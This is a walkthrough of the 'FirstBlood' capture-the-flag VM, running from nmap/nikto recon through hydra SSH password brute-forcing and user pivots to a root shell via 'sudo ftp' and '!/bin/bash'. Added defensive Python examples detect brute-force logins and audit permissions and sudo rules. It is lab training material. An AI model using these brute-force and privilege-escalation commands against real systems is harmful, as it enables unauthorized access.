Introduction: this box is fairly easy, because every step comes with a hint and the basic commands are handed to you.

1. Find the target IP: 192.168.74.130

nmap -sn 192.168.74.0/24

2. Scan the target's ports: port 80 and port 60022 (the SSH service) are open

root@kali:~# nmap -A -p- 192.168.74.130
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.74.130
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.14.0 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/johnnyrambo/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to FirstBlood!
60022/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:01:d8:27:53:50:d9:e1:9a:cb:9d:1e:4c:b0:a5:ae (RSA)
|   256 4b:c8:77:49:db:5f:38:7f:36:e1:49:da:a4:a1:7c:5d (ECDSA)
|_  256 36:c8:65:e1:45:9a:9c:66:c9:c9:21:c4:5a:25:4d:76 (ED25519)
MAC Address: 00:0C:29:0E:84:DE (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/25%OT=80%CT=1%CU=39338%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5F6D7C7E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.74.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds

3. Start with port 80. The landing page is a large block of English text; the key point is that it tells us to press Ctrl+U and look at the page source.

Just follow along: the source references a file called rambo.html.

Opening it gives yet another wall of English. It explains that an nmap scan with no extra options only shows port 80 open, but adding -p- reveals a second port. I always scan all ports anyway, so that hint is of little use here. It also says that running nikto will turn up a directory.

Below is the nikto output; it reports a johnnyrambo directory. Our earlier nmap scan had already pulled that entry out of robots.txt, so this step could be skipped.

root@kali:~# nikto -h http://192.168.74.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.74.130
+ Target Hostname:    192.168.74.130
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry ' /johnnyrambo/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ 7916 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-09-25 15:39:22 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#

Visiting that directory gives, sure enough, another wave of English. The key information sits just above the red text: first generate a wordlist with cewl, then use it to brute-force the SSH password.

4. Generate the wordlist. Before brute-forcing we also need a username. A shortcut: once the VM has booted, its login screen lists every login user, and from the information so far it is easy to guess johnny. Also remember to specify port 60022, which we found earlier. With that, hydra can go straight to work and finds the password quickly.

root@kali:~# cewl -w words.txt -d 1 -m 5 http://192.168.74.130/johnnyrambo/
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~# wc -l words.txt
137 words.txt
root@kali:~# hydra -l johnny -P words.txt -s 60022 ssh://192.168.74.130
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-25 15:47:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 137 login tries (l:1/p:137), ~9 tries per task
[DATA] attacking ssh://192.168.74.130:60022/
[60022][ssh] host: 192.168.74.130   login: johnny   password: Vietnam
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished
root@kali:~#

Step 2 actually hinted at this as well: visiting the ssh.html page gives the next hint together with the username.
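Seen from the target, the hydra run above is the pattern that sshd logging exposes most clearly: well over a hundred password attempts against one account within seconds. The Python below is an added example, not part of this write-up or of any tool it uses: it parses auth.log-style "Failed password" lines and flags a source address once its failures inside a sliding time window reach a threshold. The log lines are constructed, the year assumed for the syslog timestamps and the threshold and window are assumptions.

```python
"""Detect SSH password-guessing bursts in auth.log-style lines."""
import re
from collections import defaultdict, deque
from datetime import datetime

# One sshd failure line looks like (constructed sample, not from the page):
# Sep 25 15:47:21 firstblood sshd[1200]: Failed password for johnny from 192.168.74.1 port 50400 ssh2
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_ts(stamp, year=2020):
    # syslog timestamps omit the year; 2020 is assumed for the constructed sample
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")

def detect_bruteforce(lines, threshold=10, window_s=60):
    """Return {src: {"failures": peak_in_window, "users": {...}}} for sources that
    reach `threshold` failed logins inside any `window_s`-second window."""
    recent = defaultdict(deque)   # src -> timestamps of failures still inside the window
    users = defaultdict(set)      # src -> usernames tried from that source
    flagged = {}
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue               # successes and unrelated lines are ignored
        src, ts = m["src"], parse_ts(m["ts"])
        q = recent[src]
        q.append(ts)
        users[src].add(m["user"])
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()            # expire failures older than the window
        if len(q) >= threshold:
            peak = max(len(q), flagged.get(src, {}).get("failures", 0))
            flagged[src] = {"failures": peak, "users": users[src]}
    return flagged

def sample_log():
    """Constructed auth.log excerpt: 12 rapid failures for johnny from one host,
    one stray failure from another host, then a success (not counted)."""
    tmpl = ("Sep 25 15:47:{:02d} firstblood sshd[{}]: Failed password for johnny "
            "from 192.168.74.1 port {} ssh2")
    lines = [tmpl.format(21 + i // 4, 1200 + i, 50400 + i) for i in range(12)]
    lines.append("Sep 25 15:47:30 firstblood sshd[1300]: Failed password for invalid user admin "
                 "from 10.0.0.5 port 40001 ssh2")
    lines.append("Sep 25 15:47:31 firstblood sshd[1301]: Accepted password for johnny "
                 "from 192.168.74.1 port 50420 ssh2")
    return lines

if __name__ == "__main__":
    for src, info in detect_bruteforce(sample_log()).items():
        print(f"{src}: {info['failures']} failures in window, users tried: {sorted(info['users'])}")
```

The hydra warning about parallel tasks is the mirror image of sshd's MaxStartups limit on concurrent unauthenticated connections: that setting slows guessing down, while a check like the one above is what tells you it happened at all. On a real host, the sshd port being 60022 rather than 22 changes nothing about the log line, so the parser deliberately ignores the port.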

5. Log in over SSH with the username and password johnny/Vietnam and look at the files in the home directory

root@kali:~# ssh 192.168.74.130 -p 60022
The authenticity of host '[192.168.74.130]:60022 ([192.168.74.130]:60022)' can't be established.
ECDSA key fingerprint is SHA256:9NWBNQ2bI/RnipoZ6hHKjL8BZq69S71dcT42eAnvjpg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.74.130]:60022' (ECDSA) to the list of known hosts.
johnny@192.168.74.130's password: Vietnam (not echoed)
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Fri Sep 18 15:29:53 2020 from 192.168.86.109
johnny@firstblood:~$ ls
README.txt

There is a README.txt; its content tells us to look in the configuration file to find the web root.

johnny@firstblood:~$ cat README.txt
Nice job!  You're cruising along nicely!

When we find ourselves on a web server, we want to check out the web directory.  In case you haven't figured it out, this server is running Nginx.  For this particular
setup, I've left things at the default.  If we look in the configuration file, we can
view the location of the web directory:

cat /etc/nginx/sites-enabled/default

That's kind of noisy in the output.  We can clean it up with the following:

cat /etc/nginx/sites-enabled/default | grep -v "#"

-v is an invert match and will essentially remove all of the comment (#) lines.

When we clean it up, the line starting with "root" points to the web directory.

Move into the web directory and see if there are any files to read...

6. Read the configuration file to get the web root (it is just the default), cd into that directory, and find another README.txt

johnny@firstblood:~$ cat /etc/nginx/sites-enabled/default | grep -v "#"

server {
        listen 80 default_server;
        listen [::]:80 default_server;

        root /var/www/html;

        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }
}

johnny@firstblood:~$ cd /var/www/html
johnny@firstblood:/var/www/html$ ls
index.nginx-debian.html  johnnyrambo  rambo.html  README.txt  robots.txt
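The README's `grep -v "#"` trick works on the stock file, but it throws away any directive that merely carries a trailing comment, and that is exactly the kind of line an administrator adds when changing the web root. The Python below is an added example, not part of this write-up or of nginx: it strips comments to end of line, tracks block nesting, and returns the `listen` and `root` settings of each top-level server block. The sample configuration is constructed to mirror the default site shown above, with one trailing comment added to show the difference.

```python
"""Find the web root(s) declared in an nginx site configuration."""
import re

# Constructed sample mirroring the default site above, plus a directive that
# carries a trailing comment (the case `grep -v "#"` would drop entirely).
SAMPLE_CONFIG = """\
# Default server configuration
#
server {
    listen 80 default_server;   # IPv4
    listen [::]:80 default_server;

    root /var/www/html;

    # Add index.php to the list if you are using PHP
    index index.html index.htm index.nginx-debian.html;

    server_name _;

    location / {
        # First attempt to serve request as file, then as directory
        try_files $uri $uri/ =404;
    }
}
"""

# A token is either a block opener ("server {", "location / {"), a block
# closer "}", or one directive terminated by ';'.
TOKEN_RE = re.compile(r"\s*(?:(?P<open>[^{};]*?)\s*\{|(?P<close>\})|(?P<directive>[^{};]+);)")

def strip_comments(text):
    """Drop everything from '#' to end of line but keep the directive before it.
    nginx has no block comments; a '#' inside a quoted string is not handled here."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())

def grep_v_hash(text):
    """Mimic `grep -v "#"`: throw away every line that contains a '#' anywhere."""
    return [line for line in text.splitlines() if "#" not in line]

def server_roots(text):
    """Return [{'listen': [...], 'root': path_or_None}] for each top-level server
    block, ignoring `root` directives nested inside location blocks."""
    stack, servers = [], []
    for m in TOKEN_RE.finditer(strip_comments(text)):
        if m["open"] is not None:
            stack.append(m["open"].strip())
            if stack == ["server"]:
                servers.append({"listen": [], "root": None})
        elif m["close"]:
            stack.pop()
        else:
            parts = m["directive"].split()
            if stack == ["server"] and parts:
                if parts[0] == "listen":
                    servers[-1]["listen"].append(parts[1])
                elif parts[0] == "root":
                    servers[-1]["root"] = parts[1]
    return servers

if __name__ == "__main__":
    for s in server_roots(SAMPLE_CONFIG):
        print(f"listen {', '.join(s['listen'])} -> root {s['root']}")
```

On the sample, `grep_v_hash` loses the IPv4 `listen` line entirely, while `server_roots` still reports both listeners and the `/var/www/html` root. Knowing the exact web root matters for the defender too: it is the directory whose file permissions decide what a low-privileged shell can read or modify.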

Its content tells us to find yet another README.txt that we are able to read.

johnny@firstblood:/var/www/html$ cat README.txt
Hack the Planet!

Nice work!

I've hidden a file on this server which is readable by you.  Seems like a needle in the haystack, no?

We can use the "find" command to find files.  If I wanted to find the /etc/passwd file:

find /etc -name passwd -print

^^ would generate some permission denied errors along with the correct response.

We can redirect errors:

find /etc -name passwd -print 2>/dev/null

That last part:  2>/dev/null

^^ will redirect errors to the same place where unicorn crap ends up.  It's magic.  Don't question me.

If we run the following:

find / -type f -readable 2>/dev/null

We are going to get a LOT of noise.  However, if we fine tune this a bit:

find / -type f -readable 2>/dev/null | grep README.txt

-type f stands for type file
-readable stands for readable by this current user
| grep README.txt is a way to redirect the output to grep for a string match, the string being README.txt

We can narrow down the list.  Find the file, read the contents.

7. Use find to locate the other README.txt

johnny@firstblood:/var/www/html$ find / -type f -readable 2>/dev/null | grep README.txt
/opt/README.txt
/var/www/html/README.txt
/home/johnny/README.txt

Its content gives another username and password.

johnny@firstblood:/var/www/html$ cat /opt/README.txt
There's another user on this server that might have greater privileges:

username:  blood
password:  HackThePlanet2020!!

You can either switch users or ssh as the new user.  If you know how to do both, pick one.
If you only know how to SSH, learn to switch users.

8. Switch straight to the blood user and go to its home directory. There is a README.txt here too; it says there is another user under /home and that we should try to read the files in that user's home directory.

johnny@firstblood:/var/www/html$ su blood
Password: HackThePlanet2020!! (not echoed)
blood@firstblood:/var/www/html$ cd ~
blood@firstblood:~$ ls
README.txt
blood@firstblood:~$ cat README.txt
I didn't think you needed to be told about the README.txt file.

I'm really stoked that you're cruising along.  Nice work!

If you move into the /home directory, we can see the home directories for the other
users on this server.  There's a user directory with some text files.  Attempt to
read both files.

Move to /home: the sly directory is readable. Inside it are two files, but only one of them is readable.

blood@firstblood:~$ cd /home
blood@firstblood:/home$ ls -la
total 24
drwxr-xr-x  6 root       root       4096 Sep 18 14:24 .
drwxr-xr-x 23 root       root       4096 Sep 18 11:26 ..
drwxr-xr-x  4 blood      blood      4096 Sep 18 15:23 blood
drwx------ 17 firstblood firstblood 4096 Sep 18 11:45 firstblood
drwxr-xr-x  6 johnny     johnny     4096 Sep 18 15:24 johnny
drwxr-xr-x  4 sly        sly        4096 Sep 18 15:26 sly
blood@firstblood:/home/sly$ ls -l
total 8
-rw-rw-r-- 1 sly sly 583 Sep 18 15:26 README_FIRST.txt
-rw------- 1 sly sly 304 Sep 18 15:25 README.txt
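The two listings above are the whole story of why blood can read README_FIRST.txt (-rw-rw-r--) but not README.txt (-rw-------): the last three characters of the mode string are the permission bits for everyone who is neither owner nor group member. The Python below is an added example, not part of this write-up: it converts a symbolic mode string to its octal value (including setuid, setgid and sticky markers) and reports which entries in an `ls -l` listing are readable by the group or by the world. The listing fed to it is the page's own output, embedded here as sample data.

```python
"""Audit an `ls -l` listing for entries readable by users other than the owner."""
import re

# The /home and /home/sly listings from above, embedded as sample input.
SAMPLE_LISTING = """\
drwxr-xr-x  6 root       root       4096 Sep 18 14:24 .
drwxr-xr-x 23 root       root       4096 Sep 18 11:26 ..
drwxr-xr-x  4 blood      blood      4096 Sep 18 15:23 blood
drwx------ 17 firstblood firstblood 4096 Sep 18 11:45 firstblood
drwxr-xr-x  6 johnny     johnny     4096 Sep 18 15:24 johnny
drwxr-xr-x  4 sly        sly        4096 Sep 18 15:26 sly
-rw-rw-r--  1 sly        sly         583 Sep 18 15:26 README_FIRST.txt
-rw-------  1 sly        sly         304 Sep 18 15:25 README.txt
"""

# mode, link count, owner, group, size, month, day, time-or-year, name
LS_RE = re.compile(
    r"^(?P<mode>[-dlcbps][-rwxsStT]{9})[+@.]?\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+[\d:]+\s+(?P<name>.+)$"
)

def mode_to_octal(mode):
    """'-rwsr-xr-x' -> 0o4755. Lowercase letters set the basic bit; s/S in the
    user or group exec slot add setuid/setgid, t/T in the other exec slot add sticky."""
    perm = mode[1:10]                  # drop the file-type character
    value = special = 0
    for i, ch in enumerate(perm):
        if ch in "rwxst":
            value |= 1 << (8 - i)      # rwxrwxrwx maps to bits 8..0
        if ch in "sS":
            special |= 0o4000 if i == 2 else 0o2000
        elif ch in "tT":
            special |= 0o1000
    return special | value

def readable_by(mode_octal, who):
    """True if the read bit is set for 'user', 'group' or 'other'."""
    shift = {"user": 6, "group": 3, "other": 0}[who]
    return bool((mode_octal >> shift) & 0o4)

def parse_listing(text):
    entries = []
    for line in text.splitlines():
        m = LS_RE.match(line)
        if m:                          # "total N" and blank lines do not match
            entries.append({"name": m["name"], "owner": m["owner"],
                            "group": m["group"], "mode": mode_to_octal(m["mode"])})
    return entries

def audit_readability(text):
    """Return {name: 'world' | 'group'} for entries readable beyond their owner."""
    result = {}
    for e in parse_listing(text):
        if e["name"] in (".", ".."):
            continue
        if readable_by(e["mode"], "other"):
            result[e["name"]] = "world"
        elif readable_by(e["mode"], "group"):
            result[e["name"]] = "group"
    return result

if __name__ == "__main__":
    for name, scope in audit_readability(SAMPLE_LISTING).items():
        print(f"{name}: readable by {scope}")
```

On the sample it lists the three 755 home directories and README_FIRST.txt, and stays silent on firstblood and README.txt. Ubuntu's default of world-readable home directories is what let blood wander into /home/sly in the first place; a 750 home directory (or a tighter umask) is the usual fix.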

README_FIRST.txt tells us to enumerate our sudo privileges with sudo -l.

blood@firstblood:/home/sly$ cat README_FIRST.txt
Obviously, you're able to read this file but you're unable to read the other because
you don't have permissions.  If you perform an:  ls -al

You can see that only the user sly has permission to read README.txt

Hold that thought for a moment...

In some instances we need to perform tasks as other users or even root sometimes.
We can see if we have those permissions by typing:

sudo -l

-l stands for list, as in -- list our permissions

We discover that we have the ability to run a command as sly that might help us.

Figure out how to execute that command as the user sly.

9. sudo -l shows that we may read the README.txt above as sly. It contains sly's password and a website that is said to help with escalating to root; sudo is needed once more.

blood@firstblood:/home/sly$ sudo -l
Matching Defaults entries for blood on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blood may run the following commands on firstblood:
    (sly) /bin/cat /home/sly/README.txt
    (root) NOPASSWD: /usr/bin/esudo-properties
blood@firstblood:/home/sly$ sudo -u sly /bin/cat /home/sly/README.txt
[sudo] password for blood: HackThePlanet2020!! (not echoed)
In case I forget, my password is:  SylvesterStalone

PS -- I think root gave us sudo privileges.  I think this might be dangerous though
because I found a website:  https://gtfobins.github.io/

It shows a possible privilege escalation for root.  I'm totally going to check out
root's files.  hint hint

10. Switch to the sly user and run sudo -l again: there is an ftp command that may be run as any user.

blood@firstblood:/home/sly$ su sly
Password: SylvesterStalone (not echoed)
sly@firstblood:~$ sudo -l
Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties
sly@firstblood:~$
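Both `sudo -l` listings above contain the two things a sudoers review should catch: a program that can hand out an interactive shell (ftp's `!` command, which the write-up goes on to use) granted as ALL, and a root-run binary marked NOPASSWD. The Python below is an added example, not part of this write-up or of sudo: it parses the "may run the following commands" section, decodes each `(runas) [TAG:] command` rule and assigns a severity. The listings are constructed replicas of the page's output; the set of shell-capable programs is a placeholder containing only the one the page demonstrates, and a real audit would fill it from a maintained reference such as the GTFOBins site the README links.

```python
"""Flag risky rules in `sudo -l` output."""
import re

# Constructed replicas of the two listings shown in the write-up.
BLOOD_SUDO_L = """\
Matching Defaults entries for blood on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User blood may run the following commands on firstblood:
    (sly) /bin/cat /home/sly/README.txt
    (root) NOPASSWD: /usr/bin/esudo-properties
"""

SLY_SUDO_L = """\
Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties
"""

# Placeholder: only the program the write-up itself demonstrates. A real audit
# would populate this from a maintained reference such as GTFOBins.
SHELL_ESCAPE_BINS = {"ftp"}

# "(runas[:group]) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

def parse_sudo_l(text):
    """Return [{'runas': user, 'tags': set, 'cmd': str}] from the commands section."""
    rules, in_commands = [], False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_commands = True          # everything before this is Defaults output
            continue
        m = RULE_RE.match(line) if in_commands else None
        if m:
            rules.append({
                "runas": m["runas"].split(":")[0].strip(),
                "tags": {t.rstrip(":") for t in m["tags"].split()},
                "cmd": m["cmd"],
            })
    return rules

def audit_sudo_l(text):
    """Return [(cmd, runas, severity, reasons)] with one entry per rule."""
    report = []
    for r in parse_sudo_l(text):
        reasons = []
        binary = r["cmd"].split()[0].rsplit("/", 1)[-1]
        if r["cmd"] == "ALL":
            reasons.append("any command")
        if binary in SHELL_ESCAPE_BINS:
            reasons.append("program can spawn a shell")
        if "NOPASSWD" in r["tags"]:
            reasons.append("no password required")
        privileged = r["runas"] in ("ALL", "root")
        if privileged and any(x in reasons for x in ("any command", "program can spawn a shell")):
            severity = "high"           # amounts to a root shell
        elif reasons:
            severity = "medium"
        else:
            severity = "low"            # one fixed command with fixed arguments
        report.append((r["cmd"], r["runas"], severity, reasons))
    return report

if __name__ == "__main__":
    for user, listing in (("blood", BLOOD_SUDO_L), ("sly", SLY_SUDO_L)):
        for cmd, runas, sev, why in audit_sudo_l(listing):
            print(f"{user}: ({runas}) {cmd} -> {sev} {'; '.join(why)}")
```

The `(sly) /bin/cat /home/sly/README.txt` rule is the shape a sudoers entry should have: one binary, fixed arguments, a specific run-as user. The `(ALL) /usr/bin/ftp` rule fails on every count, and no amount of password prompting helps once the program itself can start a shell.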

So the ftp command can be used to escalate directly; that website lists many ways to escalate privileges through such commands. Once we have root, we go to its home directory and read the final README.txt.

sly@firstblood:~$ sudo ftp
[sudo] password for sly: SylvesterStalone (not echoed)
ftp> !/bin/bash
root@firstblood:~# cd /root
root@firstblood:/root# ls
README.txt
root@firstblood:/root# cat README.txt
 ______ _          _  ______ _                 _
|  ___(_)        | | | ___ \ |               | |
| |_   _ _ __ ___| |_| |_/ / | ___   ___   __| |
|  _| | | '__/ __| __| ___ \ |/ _ \ / _ \ / _` |
| |   | | |  \__ \ |_| |_/ / | (_) | (_) | (_| |
\_|   |_|_|  |___/\__\____/|_|\___/ \___/ \__,_|

 ____    ______            _           _     ____
 \ \ \   | ___ \          | |         | |   / / /
  \ \ \  | |_/ /___   ___ | |_ ___  __| |  / / /
   > > > |    // _ \ / _ \| __/ _ \/ _` | < < <
  / / /  | |\ \ (_) | (_) | ||  __/ (_| |  \ \ \
 /_/_/   \_| \_\___/ \___/ \__\___|\__,_|   \_\_\

I hope you enjoyed this box.  I wanted to create something
on the easier side because I know how frustrating and
rewarding the process can be.  If you liked this box
please reach out to me on Twitter and let me know:

@iamv1nc3nt

11. Summary

The difficulty and the step-by-step guidance of this box make it a good one for beginners and for anyone interested in this field who is just getting started.
